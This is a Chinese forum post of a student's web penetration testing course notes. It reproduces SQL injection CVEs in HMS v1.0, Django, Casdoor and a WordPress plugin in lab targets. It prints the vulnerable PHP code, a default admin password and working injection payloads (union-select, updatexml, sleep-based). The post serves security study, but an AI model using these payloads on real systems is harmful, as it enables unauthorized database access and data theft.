发帖
 找回密码
 立即注册
搜索
0 0

分享 WEB渗透系统班-Yakit 靶场结尾&扩展靶场+XSS 漏洞利用

技术分享 1200 0 2025-6-16 16:40:41
WEB渗透测试工程师系统班250303期
第19节课作业
1.复现课堂讲解的vulfocus注入靶场,截图
第1个:HMS v1.0 SQL注入(CVE-2022-23366)
介绍:医院管理系统 (HMS) 是一种基于计算机或网络的系统,有助于管理医院或任何医疗机构的运作。该系统或软件将有助于使整个功能无纸化。它将有关患者、医生、员工、医院管理细节等的所有信息集成到一个软件中。它有组成医院的各种专业人员的部分。 HMS v1.0 被发现包含通过 adminlogin.php、Patientlogin.php 的 SQL 注入漏洞。 admin/123456789
原码部分:
if(isset($_GET[editid]))
{
//漏洞触发点
$sql="SELECT * FROM appointment WHERE appointmentid='$_GET[editid]' ";
$qsql = mysqli_query($con,$sql);
$rsedit = mysqli_fetch_array($qsql);
}
?>
payload:/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,user()%23#查看当前连接用户


第2个:Django SQL注入 (CVE-2022-28346)
介绍:Django是Django软件基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。
在 2.2.28 之前的 Django 2.2、3.2.13 之前的 3.2 和 4.0.4 之前的 4.0 中发现了一个问题。QuerySet.annotate()、aggregate() 和 extra() 方法会通过精心制作的字典(带有字典扩展)作为传递的 **kwargs 在列别名中进行 SQL 注入。
访问:http://ip:port/demo?field=demo.name
POC:  http://ip:port/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --


第5个:CVE-2022-24124
描述:Casdoor 1.13.1 之前版本中的查询 API 存在与字段和值参数相关的 SQL 注入漏洞,如 api/get-organizations 所示。
POC:/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)


第6个:CVE-2022-0228
描述:插件在使用 orderby 和 order 参数之前没有验证并正确转义它们,这可能会允许高权限用户执行 SQL 注入。
POC:https://example.com/wp-admin/adm ... mp;orderby=email%2c(select+*+from(select(sleep(5)))b)&order=desc



一、笔记标题:WEB渗透系统班-Yakit 靶场结尾&扩展靶场+XSS 漏洞利用

二、文章内容:

1. 课程内容概要

        主要知识点1:CVE-2022-23366复现
        主要知识点2:CVE-2022-28346复现
        主要知识点3:CVE-2022-0228复现

2.重点知识与细节

        概念解析
        概念1: 无
        概念2:
        关键步骤
        步骤1:先找源码分析⽂章,根据复现⽂章,尝试复现
        步骤2:如果遇到了不知道(没接触)的技术点,那么要找⼀些基础的介绍⽂章做了解
        步骤3:如果遇到冷⻔漏洞,没有复现⽂章,那么就去找相关的利⽤ poc,通过 poc ⾥⾯给的语句去复现测试。如果 poc ⾥⾯的测试语句也不⽣效,那么需要⾃⼰去 ⼿⼯寻找功能点,在功能点位置去传参!!!
        相关代码)

3.实操练习 和 解析

如作业

4.个人总结

        本节课最大的收获是:对一些漏洞进行复现
        仍然存在疑问的地方:几个漏洞的复现
        需要课后深入学习的内容:漏洞复现


──── 0人觉得很赞 ────

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
免责声明:
1、本论坛中所有用户发布的内容仅代表作者个人观点,与本网站立场无关,本站不对其真实性、完整性或观点承担任何责任。
2、本论坛所提供的全部信息与内容,不保证其准确性、完整性或时效性。因阅读或使用本站内容而产生的任何误导、损失或风险,本站概不承担任何连带或法律责任。
3、当国家司法、行政机关依照法定程序要求本论坛披露用户信息时,本站予以配合并因此免责。
4、因网络线路故障、技术问题、不可抗力或本站无法控制的其他原因导致的服务中断或暂停,本站不承担由此造成的任何直接或间接损失。
5、对于任何通过技术手段破坏、攻击本论坛系统或扰乱正常秩序的行为,本站有权采取包括但不限于限制账号、封禁账号、追究法律责任等措施。
您需要登录后才可以回帖 立即登录
高级模式
返回